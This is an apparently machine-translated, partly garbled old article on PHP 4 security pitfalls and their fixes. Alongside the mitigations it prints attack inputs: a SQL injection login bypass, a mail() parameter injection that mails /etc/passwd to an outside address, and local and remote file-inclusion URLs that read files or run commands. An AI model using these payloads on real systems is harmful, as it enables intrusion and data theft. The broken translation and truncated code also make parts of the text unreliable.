The Dog of PHP security

Security Shaun Clowes article exploiting Common vulnerabilities in PHP applications did write well,


to take into account many aspects, I this article is only Dog, supplements some other not to mention the question. This article focuses on solving problems, not


attack.





1, the ancient cheat SQL statement


in default mode, even if you forget to copy php.ini to/usr/local/lib/php.ini, PHP still opens Magic_quotes_gpc=on.


so all the single quotes ('), double quotes ("), backslash backslash (), and Get/post/cookie nul from the variable from the back of the string are


(the null byte) is prefixed with a backslash so that the database can be queried correctly.


But when Php-4-rc2 introduced a configuration file php.ini-optimized, this optimization php.ini is


Magic_quotes_gpc=off. Some network administrators see optimized words may be php.ini-optimized to the


/usr/local/lib/php.ini, this time is more dangerous. Like simpler validations, suppose no necessary characters are filtered:


SELECT * FROM login where user= ' $HTTP _post_vars[user] ' and pass= ' $HTTP _post_vars[pass] '


we can enter 1 ' or 1 = ' 1 in the User box and password box to pass the verification. This is a very antique method, and this statement will


replaced by this:


SELECT * FROM login where user= ' 1 ' or 1= ' 1 ' and pass= ' 1 ' or 1 = ' 1 '


was passed because of or 1 = ' 1 '.


The best way to do this is to filter out all the unnecessary characters, as well as to recommend the Get/post/cookie from the SQL

Variable in
plus a custom function:


function Gpc2sql ($str) {


if (GET_MAGIC_QUOTES_GPC () ==1)


return $str;


Else


return addslashes ($STR);


}


is primarily for your program to be safely ported to a variety of systems.





2, the fifth parameter of the mail function


at php-4.0.5, the mail function introduced the fifth parameter to set additional command-line arguments when the message was actually sent


But there is no good check for special Shell command characters, so there is a big problem with executing commands. Like the example in the manual:


Mail ("nobody@aol.com", "the subject", $message, "from:webmaster@ $SERVER _name", "-fwebmaster@ $SERVERNAME");


This is problematic, if $server_name=;mail san@xfocus.org </etc/passwd can send the machine's password


to my mailbox.


here to remind, PHP manual There are several examples of security issues, we actually use the time do not copy, it is only a demo function


basic function, understand on it.


for the Mail function This problem, the simplest we do not need this fifth parameter, to use to filter the illegal word Furu (;), and is to modify


the PHP source package program EXT/STANDARD/MAIL.C, add the following line before if (Extra_cmd!= NULL):


Extra_cmd=null


and then recompile.





3, UNIX version of Require, include function

The Require and include functions of the
win version do not support HTTP and FTP remote files, whereas the UNIX version defaults to support remote include files.


require and include whatever extension you're in, include you in it as part of the program.


We are writing programs in order to program modularity, as well as program portability, the inevitable use of many require or include functions,


and sometimes use variables as parameters, such as: Include ("$something"); If the user can control the $something parameter, the


parameter is not filtered, then miserable pull.


can first look at any file that the Web user has Read permission, assuming that this program is called http://victim/test.php, so that we can use the following


url:http://victim/test.php?something=/etc/passwd See/etc/passwd file.


can also execute commands by using the features contained in its remote files. For example, I create a file test.php under Www.xfocus.org, the content is:


, then I can use the following URL:


Http://victim/test.php?something=http://www.xfocus.org/test.php?cmd=uname This way run any


the order of meaning.


phpMyAdmin also has this problem, we can use it to look at any document we want to see. But before you include it, use File_exist

The
function determines whether a file exists, and this file_exist does not support remote files, so the second method above cannot be used directly. But we
.

Apache logs can be used to request a URL with PHP code, so that something designated Apache log can also be executed


, but Apache logs are usually larger and have too much clutter.


Http://www.securereality.com.au/sradv00008.txt refers to the approach is more ingenious, in the way of file upload local


Execute the command script upload, will be in the server file upload temporary directory to generate php8ta02i file name, because this time the file is present


, so you can execute the execution script in the upload file by using the File_exist function.





so for include, the use of the Require function must be careful, especially if the included file is specified as a parameter, and the argument must not be


let the user to control. There is also the ability to remove remote files by modifying php.ini files. This is used
before php-4.0.3.

Disable-url-fopen-wrapper is closed in later versions with Allow_url_fopen = off.





4, Disable_function


introduced a feature disable_functions in Php-4.0.1,php.ini, which is useful and can be used to disable functions.


such as adding disable_functions in php.ini = PassThru exec system Popen So when executing these functions


will only prompt Warning:system () has been disabled for the security reasons.


Alas, but there is no way to execute the system command. Because PHP uses a lot of Perl's features, for example, you can also use (') to execute commands:


$output = ' ls-al ';


echo "


$output


";


?>


This can only be safe_mode to avoid, but the hateful safe_mode is too restrictive, do other things are also a bit of an inconvenience.








5, File upload


php File Upload problem in the article http://www.securereality.com.au/sradv00001.html has been described very clearly,


This is really a serious problem, the file we want to upload will also be placed in the Web directory, so it is easy for attackers to get some of the system's Web users


can read the document.


Fortunately, the Is_uploaded_file and Move_uploaded_file functions were provided after php-4.0.3. So php-4.0.3 upload text above


parts of the program must not use the copy function, with Move_uploaded_file instead, it will check whether it is uploaded files. If it's php-4.0.2


and below, it is recommended to add a function before copy:


function Is_uploaded_file ($filename) {


if (! $tmp _file = Get_cfg_var (' Upload_tmp_dir ')) {


$tmp _file = dirname (Tempnam (","));


}


$tmp _file.= '/'. basename ($filename);


/* User might have trailing slash in php.ini ... * *


return (ereg_replace ('/+ ', '/', $tmp _file) = = $filename);


}





This loophole in the security focus for a long time, just before the copy has a lot of verification ah, judge of the statement, so that the attack exists quite difficult, illustrious.








also, do not use environment variables, cookie variables, session variables, etc. as a relationship between life and death judgment conditions, because these variables are too easy to forge.


Oh, at hand things more, other slowly thought of add it, but also welcomed the other comrades arbitrarily add changes.





Reference Literature


1, PHP 4 changelog (http://www.php.net/ChangeLog-4.php)


2, A Study in scarlet-exploiting Common vulnerabilities in PHP applications

Translation of
(Http://www.securereality.com.au/studyinscarlet.txt) and analysist.


3, Remote command execution vulnerabilities in phpMyAdmin and Phppgadmin


(http://www.securereality.com.au/sradv00008.txt)